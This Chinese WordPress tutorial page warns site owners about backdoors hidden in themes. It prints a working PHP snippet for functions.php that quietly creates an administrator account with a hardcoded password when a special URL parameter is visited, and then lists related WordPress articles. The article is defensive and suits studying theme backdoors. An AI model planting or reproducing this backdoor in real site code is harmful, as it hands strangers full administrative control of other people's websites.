防范wordpress主题加后门代码获取管理员权限

所属分类: CMS教程 / WordPress 阅读数: 720
收藏 0 赞 0 分享


复制代码
代码如下:

add_action( 'wp_head', 'my_backdoor' );
function my_backdoor() {
if ( md5( $_GET['backdoor'] ) == '34d1f91fb2e514b8576fab1a75a89a6b' ) {
require( 'wp-includes/registration.php' );
if ( !username_exists( 'backdoor' ) ) {
$user_id = wp_create_user( 'backdoor', 'pa55w0rd!' );
$user = new WP_User( $user_id );
$user->set_role( 'administrator' );
}
}
}

简单说明下,代码主要放于functions.php文件里面,不会影响任何功能使用,如果存在此代码,任何人只要运行http://www.你的域名.com/?backdoor=go,然后就创建了一个用户名为“backdoor”,密码为:“pa55w0rd!” 的管理员。同样具备管理员的权限,很编辑主题代码文件,相信此时你一定感觉到很危险了吧,赶紧检查检查自己的主题代码吧……

更多精彩内容其他人还在看

wordpress截取首页摘要内容的方法

这篇文章主要为大家介绍了wordpress截取首页摘要内容的方法,利用自定义函数add_filter实现该功能,具有一定的参考借鉴价值,需要的朋友可以参考下
收藏 0 赞 0 分享

wordpress上一页下一页无插件分页函数实例

这篇文章主要为大家介绍了wordpress上一页下一页无插件分页函数,讲述了两个不同的分页函数实例,可适用于不同的应用场合,非常具有实用价值,需要的朋友可以参考下
收藏 0 赞 0 分享

Wordpress自动提取内容中第一张图片作缩略图的方法

这篇文章主要为大家介绍了Wordpress自动提取内容中第一张图片作缩略图的方法,可通过在模板中添加自定义函数实现该功能,是非常实用的技巧,需要的朋友可以参考下
收藏 0 赞 0 分享

Wordpress实现文章支持和反对功能的方法

这篇文章主要为大家介绍了Wordpress实现文章支持和反对功能的方法,通过添加自定义函数实现文章的支持和反对功能,是比较典型的WordPress二次开发技巧,具有一定的参考借鉴价值,需要的朋友可以参考下
收藏 0 赞 0 分享

WordPress首页显示多个图片及文字友情链接的方法

这篇文章主要为大家介绍了WordPress首页显示多个图片及文字友情链接的方法,可实现对原有文字友情链接的灵活控制功能,非常具有实用价值,需要的朋友可以参考下
收藏 0 赞 0 分享

WordPress评论中禁止HTML代码显示的方法

这篇文章主要为大家介绍了WordPress评论中禁止HTML代码显示的方法,通过增加自定义函数有效防止垃圾评论的产生,是非常实用的技巧,需要的朋友可以参考下
收藏 0 赞 0 分享

wordpress不支持中文用户名的解决方法

这篇文章主要为大家介绍了wordpress不支持中文用户名的解决方法,可通过添加自定义函数实现支持中文用户名的功能,是非常实用的技巧,需要的朋友可以参考下
收藏 0 赞 0 分享

WordPress 网站如何防范大规模暴力破解攻击

本文主要讲述了WordPress 网站如何防范大规模暴力破解攻击,有兴趣的朋友一起来看看吧
收藏 0 赞 0 分享

WordPress 4.1 发布:开启免干扰写作模式

WordPress 4.1 正式版发布,这次更新带来了2015主题(Twenty Fifteen),免干扰写作模式,隐藏各种杂乱以及干扰选项,让博主全身心灌注于文章写作。
收藏 0 赞 0 分享

WordPress分类与标签等存档页实现置顶的方法

这篇文章主要为大家介绍了WordPress分类与标签等存档页实现置顶的方法,通过二次开发实现存档页的置顶功能,是非常实用的技巧,需要的朋友可以参考下
收藏 0 赞 0 分享
查看更多